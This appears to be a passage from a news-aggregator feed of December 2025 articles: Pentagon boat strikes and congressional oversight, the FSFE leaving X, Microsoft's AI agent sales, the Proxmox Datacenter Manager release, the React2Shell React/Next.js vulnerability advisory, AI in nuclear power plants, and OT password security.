“I didn’t personally see survivors,” Hegseth told reporters, noting that he watched live footage of the attack. “The thing was on fire. It was exploded in fire and smoke. You can’t see it.”

He added, “This is called the fog of war.”

Hegseth said Adm. Frank M. Bradley , then the commander of Joint Special Operations Command, or JSOC, and now head of Special Operations Command, “made the right call” in ordering the second strike, which the war secretary claimed came after he himself left the room. In a statement to The Intercept earlier this week, Special Operations Command pushed back on the contention that Bradley ordered a double-tap attack .

“He does not see his actions on 2 SEP as a ‘double tap,’” Col. Allie Weiskopf, the director of public affairs at Special Operations Command, told The Intercept on Tuesday .

Bradley and Gen. Dan Caine, the chair of the Joint Chiefs of Staff, are slated to go to Capitol Hill on Thursday to answer questions about the attack amid an ongoing uproar. Congressional staffers say that Bradley is currently slated to only meet with House Armed Services Committee Chair Mike Rogers, R-Ala., and ranking member Rep. Adam Smith, D-Wash., along with the Senate Armed Services Committee Chair Roger Wicker, R-Miss., and ranking member Sen. Jack Reed, D-R.I.

“The Seditious Six”

Houlahan was one of six Democratic members of Congress who appeared in a video late last month reminding members of the military of their duty not to obey illegal orders. President Donald Trump called for the group to face arrest and trial or even execution , saying the video amounted to “SEDITIOUS BEHAVIOR FROM TRAITORS.”

Wilson, during her faux press briefing — delivered to mostly administration cheerleaders after outlets from the New York Times to Fox News relinquished their press passes rather than agree to restrictions that constrain reporters’ First Amendment rights —called out Houlahan and her fellow lawmakers in the video.

“[T]he Seditious Six urged members of our military to defy their chain of command in an unprecedented, treasonous and shameful conspiracy to sow distrust and chaos in our armed forces,” said Wilson. She went on to call the video “a politically motivated influence operation” that “puts our warfighters at risk.”

Hegseth described the members of Congress’s video as “despicable, reckless, and false.” Hegseth himself, however, had delivered a similar message recorded in 2016 footage revealed by CNN on Tuesday.

“If you’re doing something that is just completely unlawful and ruthless, then there is a consequence for that. That’s why the military said it won’t follow unlawful orders from their commander-in-chief,” Hegseth told an audience in the footage. “There’s a standard, there’s an ethos, there’s a belief that we are above what so many things that our enemies or others would do.”

Wilson did not reply to a request for comment about Hegseth’s remarks.

Hegseth is also on the hotseat after the Pentagon’s Inspector General’s Office determined that he risked the safety of U.S. service members by sharing sensitive military information on the Signal messaging app, according to a source familiar with the forthcoming report by the Pentagon watchdog.

The report, which is expected to be released on Thursday, was launched after a journalist at The Atlantic revealed he had been added to a chat on the encrypted messaging app in which Hegseth and other top officials were discussing plans for U.S. airstrikes in Yemen that also killed civilians .

Pentagon Claims It “Absolutely” Knows Who It Killed in Boat Strikes. Prove It, Lawmaker Says.

Intercept
theintercept.com
2025-12-04 15:41:51
Rep. Chrissy Houlahan said, “If there is intelligence to ‘absolutely confirm’ this, the Congress is ready to receive it.” The post Pentagon Claims It “Absolutely” Knows Who It Killed in Boat Strikes. Prove It, Lawmaker Says. appeared first on The Intercept....
Original Article

After Pentagon press secretary Kingsley Wilson declared the War Department was certain about the identities of supposed drug smugglers killed in boat strikes, Rep. Chrissy Houlahan, D-Pa., had some questions about the intelligence. When Houlahan called on Wilson to appear before Congress, however, the outspoken and controversial spokesperson suddenly went silent.

“I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Wilson said on Tuesday during a pseudo Pentagon press briefing where attendance was limited to media outlets that have agreed to limits on the scope of their reporting.

“Our intelligence absolutely confirms who these people are,” she said. “I can tell you that, without a shadow of a doubt, every single one of our military and civilian lawyers knows that these individuals are narcoterrorists.”

In exclusive comments to The Intercept, Houlahan expressed her doubts and demanded proof.

“If there is intelligence that ‘absolutely confirms’ this — present it. Come before the House or Senate Intelligence committees and let Congress provide the proper oversight and checks and balances the American people deserve,” said Houlahan, who serves on the House Armed Services Committee and the House Permanent Select Committee on Intelligence. “Put the whispers and doubts to rest once and for all. If there is intelligence to ‘absolutely confirm’ this, the Congress is ready to receive it. Until we all see it, you can surely understand why we are skeptical.”

Both the House Armed Services Committee and the House Permanent Select Committee on Intelligence, both of which Houlahan serves on, routinely receive classified briefings from the military.

Wilson — who touted a “new era” of working to “keep the American people informed and to ensure transparency” on Tuesday — did not respond to questions or requests for comment from The Intercept about Houlahan’s remarks or appearing before Congress.

In past classified briefings to lawmakers and congressional staff, the military has admitted that it does not know exactly who it’s killing in the boat strikes , according to seven government officials who have spoken with The Intercept.

Rep. Sara Jacobs, D-Calif., also a member of the House Armed Services Committee, said that Pentagon officials who briefed her admitted that the administration does not know the identities of all the individuals who were killed in the strikes.

“They said that they do not need to positively identify individuals on the vessels to do the strikes,” Jacobs told The Intercept in October. “They just need to show a connection to a DTO or affiliate,” she added, using shorthand for “ designated terrorist organizations ,” the Trump administration’s term for the secret list of groups with whom it claims to be at war.

Twenty-One Attacks

The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September and killing at least 83 civilians . It has not conducted a strike on a vessel since November 15.

Since the strikes began, experts in the laws of war and members of Congress from both parties say the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.

The summary executions mark a major departure from typical practice in the long-running U.S. war on drugs , where law enforcement agencies arrest suspected drug smugglers.

A double-tap strike during the initial September 2 attack — where the U.S. hit an incapacitated boat for a second time, killing two survivors clinging to the wreckage — added a second layer of illegality to strikes that experts and lawmakers say are already tantamount to murder. The double-tap strike was first reported by The Intercept .

War Secretary Pete Hegseth has been under increasing fire for that strike. The Washington Post recently reported that Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”

Hegseth acknowledged U.S. forces conducted a follow-up strike on the alleged drug boat during a Cabinet meeting at the White House on Tuesday but distanced himself from the killing of people struggling to stay afloat.

“I didn’t personally see survivors,” Hegseth told reporters, noting that he watched live footage of the attack. “The thing was on fire. It was exploded in fire and smoke. You can’t see it.”

He added, “This is called the fog of war.”

Hegseth said Adm. Frank M. Bradley , then the commander of Joint Special Operations Command and now head of Special Operations Command, “made the right call” in ordering the second strike, which the war secretary claimed came after he himself left the room. In a statement to The Intercept earlier this week, Special Operations Command pushed back on the contention that Bradley ordered a double-tap attack.

“He does not see his actions on 2 SEP as a ‘double tap,’” Col. Allie Weiskopf, the director of public affairs at Special Operations Command, told The Intercept on Tuesday.

Bradley and Gen. Dan Caine, the chair of the Joint Chiefs of Staff, are slated to go to Capitol Hill on Thursday to answer questions about the attack amid an ongoing uproar. Congressional staffers say that Bradley is currently slated to only meet with House Armed Services Committee Chair Mike Rogers, R-Ala., and ranking member Rep. Adam Smith, D-Wash., along with the Senate Armed Services Committee Chair Roger Wicker, R-Miss., and ranking member Sen. Jack Reed, D-R.I.

“The Seditious Six”

Houlahan was one of six Democratic members of Congress who appeared in a video late last month reminding members of the military of their duty not to obey illegal orders. President Donald Trump called for the group to face arrest and trial or even execution , saying the video amounted to “SEDITIOUS BEHAVIOR FROM TRAITORS.”

Wilson, during her faux press briefing — delivered to mostly administration cheerleaders after outlets from the New York Times to Fox News relinquished their Pentagon press passes rather than agree to restrictions that constrain reporters’ First Amendment rights — called out Houlahan and her fellow lawmakers in the video.

“[T]he Seditious Six urged members of our military to defy their chain of command in an unprecedented, treasonous and shameful conspiracy to sow distrust and chaos in our armed forces,” said Wilson. She went on to call the video “a politically motivated influence operation” that “puts our warfighters at risk.”

Hegseth described the members of Congress’s video as “despicable, reckless, and false.” Hegseth himself, however, had delivered a similar message recorded in 2016 footage revealed by CNN on Tuesday.

“If you’re doing something that is just completely unlawful and ruthless, then there is a consequence for that. That’s why the military said it won’t follow unlawful orders from their commander-in-chief,” Hegseth told an audience in the footage. “There’s a standard, there’s an ethos, there’s a belief that we are above what so many things that our enemies or others would do.”

Wilson did not reply to a request for comment about Hegseth’s remarks.

Hegseth is also in the hot seat after the Pentagon Inspector General’s Office determined that he risked the safety of U.S. service members by sharing sensitive military information on the Signal messaging app, according to a source familiar with the forthcoming report by the Pentagon watchdog.

The report, which is expected to be released on Thursday, was launched after a journalist at The Atlantic revealed he had been added to a chat on the encrypted messaging app, in which Hegseth and other top officials were discussing plans for U.S. airstrikes in Yemen that also killed civilians .

The Free Software Foundation Europe deleted its account on X

Hacker News
fsfe.org
2025-12-04 15:33:14
Comments...
Original Article

News

on:

The Free Software Foundation Europe deleted its account on X. The platform never aligned with our values and no longer serves as a space for communication. What initially intended to be a place for dialogue and information exchange has turned into a centralised arena of hostility, misinformation, and profit-driven control, far removed from the ideals of freedom we stand for.

A split image shows the Twitter bird icon dissolving into digital fragments on the left and a colorful decentralized network on the right, with bright light at the center.

Since Elon Musk acquired the social network formerly known as Twitter and rebranded it as X, the Free Software Foundation Europe (FSFE) has been closely monitoring the developments of this proprietary platform, a space we were never comfortable joining, yet one that was once important for reaching members of society who were not active in our preferred spaces for interaction. Over time, it has become increasingly hostile, with misinformation, harassment, and hate speech more visible than ever.

The FSFE initially joined Twitter as it offered a space to promote the Free Software values and to interact with policymakers, journalists, and above all, reaching to people who were not yet familiar with Free Software and its benefits. The social network was another tool the FSFE used to share information about our initiatives, to explain to users their right to control our technology, and to promote software freedom across society, while also encouraging the use of alternative, decentralised social media networks.

However, the current platform direction and climate combined with an algorithm that prioritises hatred, polarisation, and sensationalism, alongside growing privacy and data protection concerns, has led us to the decision to part ways with this platform.

Consequently, the FSFE decided to permanently delete its account on X . We keep being active on some other proprietary platforms in order to reach a wider part of society, journalists, and decision makers.

At the same time, we strongly encourage everyone who shares our commitment to digital freedom and decentralisation to join us in the Fediverse. Unlike proprietary platforms driven by profit and centralised control, the Fediverse empowers users to choose how and where they connect, ensuring transparency, autonomy, and resilience. Follow the FSFE on Mastodon and Peertube !

Microsoft drops AI sales targets in half after salespeople miss their quotas

Hacker News
arstechnica.com
2025-12-04 15:31:52
Comments...
Original Article

Skip to content

Report: Microsoft declared “the era of AI agents” in May, but enterprise customers aren’t buying.

Microsoft has lowered sales growth targets for its AI agent products after many salespeople missed their quotas in the fiscal year ending in June, according to a report Wednesday from The Information. The adjustment is reportedly unusual for Microsoft, and it comes after the company missed a number of ambitious sales goals for its AI offerings.

AI agents are specialized implementations of AI language models designed to perform multistep tasks autonomously rather than simply responding to single prompts. So-called “agentic” features have been central to Microsoft’s 2025 sales pitch: At its Build conference in May, the company declared that it has entered “the era of AI agents.”

The company has promised customers that agents could automate complex tasks, such as generating dashboards from sales data or writing customer reports. At its Ignite conference in November, Microsoft announced new features like Word, Excel, and PowerPoint agents in Microsoft 365 Copilot, along with tools for building and deploying agents through Azure AI Foundry and Copilot Studio. But as the year draws to a close, that promise has proven harder to deliver than the company expected.

According to The Information, one US Azure sales unit set quotas for salespeople to increase customer spending on a product called Foundry , which helps customers develop AI applications, by 50 percent. Less than a fifth of salespeople in that unit met their Foundry sales growth targets. In July, Microsoft lowered those targets to roughly 25 percent growth for the current fiscal year. In another US Azure unit, most salespeople failed to meet an earlier quota to double Foundry sales, and Microsoft cut their quotas to 50 percent for the current fiscal year.

The sales figures suggest enterprises aren’t yet willing to pay premium prices for these AI agent tools. And Microsoft’s Copilot itself has faced a brand preference challenge: Earlier this year, Bloomberg reported that Microsoft salespeople were having trouble selling Copilot to enterprises because many employees prefer ChatGPT instead. The drugmaker Amgen reportedly bought Copilot software for 20,000 staffers, but many employees gravitated toward OpenAI’s chatbot instead, with Copilot mainly used for Microsoft-specific tasks like Outlook and Teams.

A Microsoft spokesperson declined to comment on the changes in sales quotas when asked by The Information. But behind these withering sales figures may lie a deeper, more fundamental issue: AI agent technology likely isn’t ready for the kind of high-stakes autonomous business work Microsoft is promising.

The gap between promise and reality

The concepts behind agentic AI systems emerged shortly after the release of OpenAI’s GPT-4 in 2023. They typically involve spinning off “worker tasks” to AI models running in parallel with a supervising AI model, and incorporate techniques to evaluate and act on their own results. Over the past few years, companies like Anthropic, Google, and OpenAI have refined those early approaches into far more useful products for tasks like software development, but they are still prone to errors.

At the heart of the problem is the tendency for AI language models to confabulate , which means they may confidently generate a false output that is stated as being factual. While confabulation issues have reduced over time with more recent AI models, as we’ve seen through recent studies, the simulated reasoning techniques behind the current slate of agentic AI assistants on the market can still make catastrophic mistakes and run with them, making them unreliable for the kinds of hands-off autonomous work companies like Microsoft are promising.

While looping agentic systems are better at catching their own mistakes than running a single AI model alone, they still inherit the fundamental pattern-matching limitations of the underlying AI models, particularly when facing novel problems outside their training distribution. So if an agent isn’t properly trained to perform a task or encounters a unique scenario, it could easily draw the wrong inference and make costly mistakes for a business.

The “ brittleness ” of current AI agents is why the concept of artificial general intelligence , or AGI, is so appealing to those in the AI industry. In AI, “general intelligence” typically implies an AI model that can learn or perform novel tasks without having to specifically be shown thousands or millions of examples of it beforehand. Although AGI is a nebulous term that is difficult to define in practice, if such a general AI system were ever developed, it would hypothetically make for a far more competent agentic worker than what AI companies offer today.

Despite these struggles, Microsoft continues to spend heavily on AI infrastructure. The company reported capital expenditures of $34.9 billion for its fiscal first quarter ending in October, a record, and warned that spending would rise further. The Information notes that much of Microsoft’s AI revenue comes from AI companies themselves renting cloud infrastructure rather than from traditional enterprises adopting AI tools for their own operations.

For now, as all eyes focus on a potential bubble in the AI market, Microsoft seems to be building infrastructure for a revolution that many enterprises haven’t yet signed up for.

Benj Edwards is Ars Technica's Senior AI Reporter and founder of the site's dedicated AI beat in 2022. He's also a tech historian with almost two decades of experience. In his free time, he writes and records music, collects vintage computers, and enjoys nature. He lives in Raleigh, NC.

104 Comments

Proxmox Datacenter Manager 1.0 available

Hacker News
www.proxmox.com
2025-12-04 15:31:12
Comments...
Original Article

VIENNA, Austria – December 04, 2025 –Enterprise software developer Proxmox Server Solutions GmbH (henceforth “Proxmox”) today announced the immediate availability of the stable version 1.0 of Proxmox Datacenter Manager. This new product directly addresses the increasing complexity of operating distributed and large-scaled Proxmox-based environments. Proxmox Datacenter Manager offers a holistic single pane of glass view for the administration, monitoring, and scaling of Proxmox VE and Proxmox Backup Server, with the primary goal of providing administrators with comprehensive and seamless control.

Managing growing data centers, distributed across multiple locations or clusters, consistently presents major challenges for enterprises and teams. A lack of global oversight, fragmented metrics, and the need to perform complex operations manually across various environments can quickly lead to inefficiencies and increased error susceptibility.

Proxmox Datacenter Manager was developed as the strategic answer to this scaling challenge. It bridges the gap between individual Proxmox-based nodes and clusters, providing a unified view of the entire infrastructure. This not only simplifies routine tasks but also enables advanced functionalities that were previously difficult to achieve.

Highlights of Proxmox Datacenter Manager 1.0

Proxmox Datacenter Manager delivers a set of core functions specifically designed for managing complex, enterprise-grade environments:

  • Centralized overview and metrics aggregation: Users can connect multiple Proxmox “remotes” (nodes and clusters) and gain a real-time, consolidated overview from a single dashboard. The consolidated dashboard displays the global health status of all Proxmox VE clusters and Proxmox Backup Server instances. It aggregates critical resource usage, including CPU, RAM, and storage I/O, and provides an immediate view of critical key performance indicators (KPIs) and performance metrics to identify bottlenecks and potential issues early on. Data is cached locally, maintaining offline visibility of the last known state.
  • Dynamic, role-based custom views: With customizable dashboards, IT teams can create highly filtered, targeted overviews based on specific remotes, resource types, or operational tags. Crucially, the Proxmox Datacenter Manager leverages its native role-based access control (RBAC) to grant users access to these tailored views without providing direct access to the underlying virtual machines or hosts. This functionality ensures granular permission management and delivers need-to-know transparency across diverse teams and multi-tenant environments.
  • Multi-cluster management: Seamlessly connect to and manage independent Proxmox-based clusters and standalone nodes.
  • Cross-cluster live migration: One of the most prominent features is the capability for the live migration of VMs between different clusters. This empowers administrators to perform responsive load shifts and maintenance work without downtime.
  • Basic VM & container life-cycle management for virtual infrastructure: Routine administrative tasks such as starting, stopping, or configuring VMs, containers, and storage resources can be executed directly from the central interface. Further, with the included native Role-Based Access Control (RBAC), Proxmox Datacenter Manager allows to precisely manage user permissions and centralize task histories and logs to simplify auditing and meeting compliance requirements.
  • Powerful search functionality: Version 1.0 comes with a highly intuitive and powerful search functionality. Inspired by query languages like those used in Elasticsearch and GitHub, administrators can instantly filter and locate resources. Data can be filtered by resource type (remote, VM, container), status (stopped, running, etc.) or by custom tags, therefore ensuring that even in infrastructures managing thousands of virtual guests, critical resources and diagnostic data are found with unprecedented speed and precision.
  • Centralized SDN capabilities (EVPN): The platform features support for Software-Defined Networking (SDN), enabling the configuration of EVPN zones and VNets across multiple remotes from a single interface, simplifying complex network overlays and network administration in highly scaled environments.
  • Centralized update management: Proxmox Datacenter Manager introduces a central Update Management Panel that gives administrators an instant overview of all available updates across their entire Proxmox VE and Proxmox Backup Server infrastructure. Updates can be rolled out directly from the Datacenter Manager interface, simplifying patch management and strengthening the overall security posture. In addition, Datacenter Manager provides unified, secure shell access to all managed remotes from a single console.
  • Open-source software stack: Proxmox Datacenter Manager is based on Debian 13.2 “Trixie”, uses a newer Linux kernel version 6.17 as stable default, and includes ZFS 2.3. Furthermore, its core software stack is written in the high-performance Rust programming language, with a responsive user interface built upon the new Rust/Yew Proxmox UI framework, delivering enhanced speed and an optimal user experience.

"The modern infrastructure landscape demands adaptability, from data centers to edge locations. Organizations need tools that evolve alongside their business. Proxmox Datacenter Manager is designed as a key building block within our expanding ecosystem, empowering customers with the right solution for every stage of their journey", says Tim Marx, COO at Proxmox. "By choosing the Proxmox ecosystem, organizations unlock a wide range of deployment options. From high-performance setups at hyperscalers to distributed branch offices that maintain data sovereignty. Our consistent commitment to openness ensures long-term interoperability and real freedom of choice for customers and partners."

Availability

Proxmox Datacenter Manager 1.0 is immediately available for download. Users can obtain a complete installation image via ISO download, which contains the full feature-set of the solution and can be installed quickly on bare-metal systems using an intuitive installation wizard.

Seamless distribution upgrades from older versions of Proxmox Datacenter Manager are possible using the standard APT package management system. Furthermore, it is also possible to install Proxmox Datacenter Manager on top of an existing Debian installation. As Free/Libre and Open Source Software (FLOSS), the entire solution is published under the GNU AGPLv3.

For enterprise users, Proxmox Server Solutions GmbH offers professional support through subscription plans. A subscription provides access to the stable Enterprise Repository with timely updates via the web interface, as well as to certified technical support and is recommended for production use. Customers with active Enterprise Support for their Proxmox remotes also gain access to Proxmox Datacenter Manager updates and support.

Resources:

###

About Proxmox Server Solutions
Proxmox provides powerful and user-friendly open-source server software. Enterprises of all sizes and industries use the Proxmox solutions to deploy efficient and simplified IT infrastructures, minimize total cost of ownership, and avoid vendor lock-in. Proxmox also offers commercial support, training services, and an extensive partner ecosystem to ensure business continuity for its customers. Proxmox Server Solutions GmbH was established in 2005 and is headquartered in Vienna, Austria.

Contact: Daniela Häsler, Proxmox Server Solutions GmbH, marketing@proxmox.com

The Math Legend Who Just Left Academia–For an AI Startup Run by a 24-Year-Old

Hacker News
www.wsj.com
2025-12-04 15:26:29
Comments...
Original Article

Please enable JS and disable any ad blocker

Critical React, Next.js flaw lets hackers execute code on servers

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 15:11:54
A maximum severity vulnerability, dubbed 'React2Shell', in the React Server Components (RSC) 'Flight' protocol allows remote code execution without authentication in React and Next.js applications. [...]...
Original Article

Critical React, Next.js flaw lets hackers execute code on servers

A maximum severity vulnerability, dubbed 'React2Shell', in the React Server Components (RSC) 'Flight' protocol allows remote code execution without authentication in React and Next.js applications.

The security issue stems from insecure deserialization. It received a severity score of 10/10 and has been assigned the identifiers CVE-2025-55182 for React and CVE-2025-66478 (CVE rejected in the National Vulnerability Database) for Next.js.

Security researcher Lachlan Davidson discovered the flaw and reported it to React on November 29. He found that an attacker could achieve remote code execution (RCE) by sending a specially crafted HTTP request to React Server Function endpoints.

"Even if your app does not implement any React Server Function endpoints, it may still be vulnerable if your app supports React Server Components [RCS]," warns the security advisory from React.

The following packages in their default configuration are impacted:

  • react-server-dom-parcel
  • react-server-dom-turbopack
  • and react-server-dom-webpack

React is an open-source JavaScript library for building user interfaces. It's maintained by Meta and widely adopted by organizations of all sizes for front-end web development.

Next.js, maintained by Vercel , is a framework built on top of React that adds server-side rendering, routing, and API endpoints.

Both solutions are widely present in cloud environments through front-end applications that help scale and deploy architectures faster and easier.

Researchers at Wiz cloud security platform warn that the vulnerability is easy to exploit and exists in the default configuration of the affected packages.

Impact and fixes

According to React, the vulnerability is present in versions 19.0, 19.1.0, 19.1.1, and 19.2.0. Next.js is impacted in experimental canary releases starting with 14.3.0-canary.77, and all releases of the 15.x and 16.x branches below the patched versions.

The flaw exists in the 'react-server' package used by React Server Components (RSC), but Next.js inherits it through its implementation of the RSC "Flight" protocol.

Wiz researchers say that 39% of all cloud environments where they have visibility contain instances of Next.js or React running versions vulnerable to CVE-2025-55182, CVE-2025-66478, or both.

The same vulnerability likely exists in other libraries that implement React Server, including the Vite RSC plugin, Parcel RSC plugin, React Router RSC preview, RedwoodSDK, and Waku.

Software supply-chain security company Endor Labs explains that the React2Shell "is a logically insecure deserialization vulnerability where the server fails to properly validate the structure of incoming RSC payloads."

There is a validation failure when receiving the malformed data from the attacker, which results in executing privileged JavaScript code in the context of the server.

Davidson created a React2Shell website , where he will publish technical details. The researcher is also warning that there are proof-of-concept (PoCs) exploits that are not genuine.

These PoCs invoke functions like vm#runInThisContext , child_process#exec , and fs#writeFile, but a genuine exploit does not need this, the researcher says.

"This would only be exploitable if you had consciously chosen to let clients invoke these, which would be dangerous no matter what," Davidson notes.

He further explained that these fake PoCs would not work with Next.js since these functions are not present due to the list of server functions being managed automatically.

Developers are strongly advised to apply the fixes available in React versions 19.0.1, 19.1.2, and 19.2.1, and Next.js versions 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, and 16.0.7.

Organizations should audit their environments to determine if they use a vulnerable version and take the appropriate action to mitigate the risk.

The popularity of the two solutions is reflected in the number of weekly downloads, as React counts 55.8 million on the Node Package Manager (NPM), and Next.js has 16.7 million on the same platform.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

‘Atoms for Algorithms:’ The Trump Administration’s Top Nuclear Scientists Think AI Can Replace Humans in Power Plants

403 Media
www.404media.co
2025-12-04 15:11:34
A presentation at the International Atomic Energy Agency unveiled Big Tech’s vision of an AI and nuclear fueled future....
Original Article

During a presentation at the International Atomic Energy Agency’s (IAEA) International Symposium on Artificial Intelligence on December 3, a US Department of Energy scientist laid out a grand vision of the future where nuclear energy powers artificial intelligence and artificial intelligence shapes nuclear energy in “a virtuous cycle of peaceful nuclear deployment.”

“The goal is simple: to double the productivity and impact of American science and engineering within a decade,” Rian Bahran, DOE Deputy Assistant Secretary for Nuclear Reactors, said.

His presentation and others during the symposium, held in Vienna, Austria, described a world where nuclear powered AI designs, builds, and even runs the nuclear power plants they’ll need to sustain them. But experts find these claims, made by one of the top nuclear scientists working for the Trump administration, to be concerning and potentially dangerous.

Tech companies are using artificial intelligence to speed up the construction of new nuclear power plants in the United States. But few know the lengths to which the Trump administration is paving the way and the part it's playing in deregulating a highly regulated industry to ensure that AI data centers have the energy they need to shape the future of America and the world.

At the IAEA, scientists, nuclear energy experts, and lobbyists discussed what that future might look like. To say the nuclear people are bullish on AI is an understatement. “I call this not just a partnership but a structural alliance. Atoms for algorithms. Artificial intelligence is not just powered by nuclear energy. It’s also improving it because this is a two way street,” IAEA Director General Rafael Mariano Grossi said in his opening remarks.

In his talk, Bahran explained that the DOE has partnered with private industry to invest $1 trillion to “build what will be an integrated platform that connects the world’s best supercomputers, AI systems, quantum systems, advanced scientific instruments, the singular scientific data sets at the National Laboratories—including the expertise of 40,000 scientists and engineers—in one platform.”

Image via the IAEA.

Big tech has had an unprecedented run of cultural, economic, and technological dominance, expanding into a bubble that seems to be close to bursting. For more than 20 years new billion dollar companies appeared seemingly overnight and offered people new and exciting ways of communicating. Now Google search is broken, AI is melting human knowledge , and people have stopped buying a new smart phone every year. To keep the number going up and ensure its cultural dominance, tech (and the US government) are betting big on AI.

The problem is that AI requires massive datacenters to run and those datacenters need an incredible amount of energy. To solve the problem, the US is rushing to build out new nuclear reactors. Building a new power plant safely is a mutli-year long process that requires an incredible level of human oversight. It’s also expensive. Not every new nuclear reactor project gets finished and they often run over budget and drag on for years.

But AI needs power now, not tomorrow and certainly not a decade from now.

According to Bahran, the problem of AI advancement outpacing the availability of datacenters is an opportunity to deploy new and exciting tech. “We see a future of and near future, by the way, an AI driven laboratory pipeline for materials modeling, discovery, characterization, evaluation, qualification and rapid iteration,” he said in his talk, explaining how AI would help design new nuclear reactors. “These efforts will substantially reduce the time and cost required to qualify advanced materials for next generation reactor systems. This is an autonomous research paradigm that integrates five decades of global irradiation data with generative AI robotics and high throughput experimentation methodologies.”

“For design, we’re developing advanced software systems capable of accelerating nuclear reactor deployments by enabling AI to explore the comprehensive design spaces, generate 3D models, [and] conduct rigorous failure mode analyzes with minimal human intervention,” he added. “But of course, with humans in the loop. These AI powered design tools are projected to reduce design timelines by multiple factors, and the goal is to connect AI agents to tools to expedite autonomous design.”

Bahran also said that AI would speed up the nuclear licensing process, a complex regulatory process that helps build nuclear power plants safely. “Ultimately, the objective is, how do we accelerate that licensing pathway?” he said. “Think of a future where there is a gold standard, AI trained capacity building safety agent.”

He even said that he thinks AI would help run these new nuclear plants. “We're developing software systems employing AI driven digital twins to interpret complex operational data in real time, detect subtle operational deviations at early stages and recommend preemptive actions to enhance safety margins,” he said.

One of the slides Bahran showed during the presentation attempted to quantify the amount of human involvement these new AI-controlled power plants would have. He estimated  less than five percent “human intervention during normal operations.”

Image via IAEA.

“The claims being made on these slides are quite concerning, and demonstrate an even more ambitious (and dangerous) use of AI than previously advertised, including the elimination of human intervention. It also cements that it is the DOE's strategy to use generative AI for nuclear purposes and licensing, rather than isolated incidents by private entities,” Heidy Klaaf, head AI scientist at the AI Now Institute, told 404 Media.

“The implications of AI-generated safety analysis and licensing in combination with aspirations of <5% of human intervention during normal operations, demonstrates a concerted effort to move away from humans in the loop,” she said. “This is unheard of when considering frameworks and implementation of AI within other safety-critical systems, that typically emphasize meaningful human control.”

💡

Do you know anything else about this story? I would love to hear from you. Using a non-work device, you can message me securely on Signal at +1 347 762-9212 or send me an email at matthew@404media.co.

Sofia Guerra, a career nuclear safety expert who has worked with the IAEA and US Nuclear Regulatory Commission, attended the presentation live in Vienna. “I’m worried about potential serious accidents, which could be caused by small mistakes made by AI systems that cascade,” she said. “Or humans losing the know-how and safety culture to act as required.”

About the author

Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.

Matthew Gault

How strong password policies secure OT systems against cyber threats

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 15:11:22
OT environments rely on aging systems, shared accounts, and remote access, making weak or reused passwords a major attack vector. Specops Software explains how stronger password policies and continuous checks for compromised credentials help secure critical OT infrastructure. [...]...
Original Article

Specops OT Environment

Operational technology (OT) interacts with crucial real-world infrastructure, empowering everything from energy plants to manufacturing facilities. Such environments are obvious targets for cyberattacks , but OT security often leaves much to be desired.

OT is a broader concept than IT, describing the systems, both software and hardware, that underpin industrial environments. This means OT works directly with the physical world : things like Supervisory Control and Data Acquisition (SCADA) systems or Industrial Control Systems (ICS).

While there’s significant overlap with IT, the priorities are very different. As the UK’s National Cyber Security Centre (NCSC) notes:

“Where cybersecurity for IT has traditionally been concerned with information confidentiality, integrity and availability, OT priorities are often safety, reliability and availability, as there are clearly physical dangers associated with OT failure or malfunction.”

Key password challenges in OT security

OT environments aren’t just tempting targets for criminals, they are also uniquely vulnerable. For instance, the hardware and software in these environments is often outdated and resource-constrained, notes the World Economic Forum .

And things are growing more complex. IT and OT are increasingly intermingled, creating the potential for a criminal to exploit user credentials or reused passwords and to expand their attacks. The Internet of Things (IoT) introduces a new layer of connected systems that naturally increases the surface area for attack.

There are also unique challenges when it comes to passwords. As in the IT space, passwords remain a core function of security, even when users deploy multi-factor authentication (MFA) and other complementary approaches. However, the OT sector faces exacerbated risks and even unique dangers when compared with IT.

Interested to know how many of your users have weak or breached passwords? Run a read-only scan of your Active Directory today with our free tool: Specops Password Auditor .

Shared accounts and workstations

Sometimes, credential-sharing can enable bad actors to expand their threat, even moving from IT systems to OT, physical infrastructure. Likewise, the nature of OT work, for example, in remote infrastructure, could see people sharing workstations, boosting overall vulnerabilities.

Risks from remote access

Often, vendors and other third parties will need to access the OT environment remotely: this could involve specialists working on support or maintenance contracts, for instance. Such remote access pathways could introduce new vulnerabilities that need to be protected .

Outdated OT systems

Big infrastructure investments in areas like energy or manufacturing are often made with long-term operations in mind, not necessarily the demands of cybersecurity; indeed, some of the systems used in the OT environment may have been put in place years or even decades ago. This could introduce opportunities for sophisticated, modern cybercriminals.

Strengthening OT password security

So how can operators of OT environments mitigate the risk? It’s vital to build robust foundations by adopting best practices for password policies .

Password security is just as important in OT environments as in IT, and in some instances may be even more vital, given the potentially life-threatening consequences that could stem from a shutdown or outage.
Core password best practices for OT

There are some basic, but vital, priorities to keep in mind:

  1. Password length: This is the single most important factor in password security, particularly as criminals deploy brute force attacks to crack easily guessable selections (such as common words or repeating characters). For example, a powerful computer that might take one minute to guess an 8-character password could take more than 208 billion minutes to guess a password of 16 characters , even when both are all lowercase.
  2. Rotation: If you leave a password unchanged for long periods of time, you could provide criminals with an extended opportunity to crack it. A password rotation policy is one way to address this issue, though the specific timeframe used will depend on the organization in question. It’s also important to ensure password hygiene: for example, ensuring that old passwords aren’t reused.
  3. Password vaults: These store information in encrypted format and are often used to protect accounts that cover multiple users . They are usually protected by controls like hardware tokens.

Password length

Building a resilient OT security architecture

While passwords remain the linchpin of cybersecurity, they should be used in tandem with other security approaches to build a truly robust OT environment.

For example, MFA is often viewed as the gold standard in security . This boosts the security of OT environments by adding several other layers of security on top of passwords : this could include message-based methods, challenge-based authenticator apps, or FIDO2 authentication.

Some OT environments may also make use of Privileged Access Workstations (PAWs), which essentially separate the infrastructure used for high-risk activities from potentially compromising functions, such as web browsing or email access. However, it’s important to balance security with useability.

